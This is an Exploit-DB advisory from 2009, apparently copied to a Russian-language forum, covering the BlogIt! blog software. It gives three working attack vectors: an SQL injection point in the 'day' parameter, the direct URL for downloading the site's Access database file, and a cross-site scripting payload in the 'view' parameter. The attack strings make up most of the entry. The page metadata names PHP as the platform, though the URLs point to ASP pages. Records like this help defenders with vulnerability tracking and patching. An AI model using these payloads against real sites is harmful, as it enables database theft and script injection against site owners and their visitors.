- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 7806
- Проверка EDB
-
- Пройдено
- Автор
- POUYA_SERVER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0337 cve-2009-0336 cve-2009-0335 cve-2009-0334
- Дата публикации
- 2009-01-16
Код:
#########################################################
---------------------------------------------------------
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (SQL/DD/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
---------------------------------
# milw0rm.com [2009-01-16]- Источник
- www.exploit-db.com
